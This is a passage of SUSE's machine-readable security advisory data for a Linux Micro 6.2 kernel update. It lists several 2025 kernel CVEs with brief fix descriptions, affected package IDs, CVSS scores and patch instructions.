"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71135"
},
{
"cve": "CVE-2025-71136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: adv7842: Avoid possible out-of-bounds array accesses in adv7842_cp_log_status()\n\nIt\u0027s possible for cp_read() and hdmi_read() to return -EIO. Those\nvalues are further used as indexes for accessing arrays.\n\nFix that by checking return values where it\u0027s needed.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71136",
"url": "https://www.suse.com/security/cve/CVE-2025-71136"
},
{
"category": "external",
"summary": "SUSE Bug 1256759 for CVE-2025-71136",
"url": "https://bugzilla.suse.com/1256759"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71136"
},
{
"cve": "CVE-2025-71137",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71137"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-pf: fix \"UBSAN: shift-out-of-bounds error\"\n\nThis patch ensures that the RX ring size (rx_pending) is not\nset below the permitted length. This avoids UBSAN\nshift-out-of-bounds errors when users passes small or zero\nring sizes via ethtool -G.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71137",
"url": "https://www.suse.com/security/cve/CVE-2025-71137"
},
{
"category": "external",
"summary": "SUSE Bug 1256760 for CVE-2025-71137",
"url": "https://bugzilla.suse.com/1256760"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71137"
},
{
"cve": "CVE-2025-71138",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71138"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dpu: Add missing NULL pointer check for pingpong interface\n\nIt is checked almost always in dpu_encoder_phys_wb_setup_ctl(), but in a\nsingle place the check is missing.\nAlso use convenient locals instead of phys_enc-\u003e* where available.\n\nPatchwork: https://patchwork.freedesktop.org/patch/693860/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71138",
"url": "https://www.suse.com/security/cve/CVE-2025-71138"
},
{
"category": "external",
"summary": "SUSE Bug 1256785 for CVE-2025-71138",
"url": "https://bugzilla.suse.com/1256785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
